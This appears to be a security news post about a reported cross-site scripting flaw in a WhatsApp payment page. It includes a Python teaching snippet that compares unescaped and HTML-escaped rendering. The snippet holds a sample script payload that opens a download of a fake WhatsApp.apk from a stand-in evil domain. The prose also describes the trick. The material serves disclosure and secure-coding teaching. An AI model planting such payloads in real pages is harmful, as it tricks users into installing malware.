Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (including web browsers themselves, through breaches of browser security) that enables attackers to inject client-side script into web pages viewed by other users.
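As an added illustration of the mechanism described above (this is not the sample code the post refers to and not WhatsApp code), the following Python snippet shows a page fragment that reflects an untrusted request parameter unescaped, beside the hardened version that HTML-encodes it on output. The parameter name, the page fragment and the injected value are constructed for the example; the injected value mirrors the pop-up-to-download trick the post describes, so the check can show the difference between the two renderings.

```python
import html

# Constructed sample input: an attacker-controlled value reflected into the page.
# It reproduces the pop-up trick described in the post (assumed URL from the post).
UNTRUSTED_INPUT = '<script>window.open("http://www.evilwebsite/WhatsApp.apk")</script>'


def render_vulnerable(payee: str) -> str:
    """Reflects the parameter verbatim into HTML: the pattern behind reflected XSS.

    Whatever markup the parameter carries becomes part of the document, so a
    <script> element supplied by the attacker is executed by the victim's browser.
    """
    return "<p>Payment for: " + payee + "</p>"


def render_hardened(payee: str) -> str:
    """Escapes the parameter for an HTML text context before embedding it.

    html.escape turns <, >, &, " and ' into entities, so the browser renders the
    attacker's input as visible text rather than interpreting it as markup.
    """
    return "<p>Payment for: " + html.escape(payee, quote=True) + "</p>"


def contains_active_content(rendered: str) -> bool:
    """Crude output check useful in a unit test: a raw <script> tag or a
    javascript: URL in the rendered fragment means escaping was skipped."""
    lowered = rendered.lower()
    return "<script" in lowered or "javascript:" in lowered


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = renderer(UNTRUSTED_INPUT)
        print(f"{name}: active content present = {contains_active_content(out)}")
        print("   ", out)
```

The fix is output encoding chosen for the context into which the data is inserted (here an HTML text node); data placed inside attributes, URLs or inline script needs the encoding appropriate to that context, and `contains_active_content` is only a regression check, not a substitute for escaping.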
The reported vulnerability exists on the payment procedure page, as shown in the picture above. The sample code given below demonstrates the vulnerability.
Recently there has been an increase in web malware and spam activity, and such vulnerabilities can be misused by attackers to spread malware and rogue applications.
Edgard also demonstrates how this can be used to trick users into downloading a fake application (malware named WhatsApp.apk) from any evil domain (www.evilwebsite/WhatsApp.apk). In the example given below, the attacker simply uses a pop-up window to open the fake application's download link.
The official binary is at https://www.whatsapp.com/android/current/WhatsApp.apk
According to reports, mobile malware in 2012 increased 50 times over any previous year. We request the WhatsApp team to fix the vulnerability as soon as possible.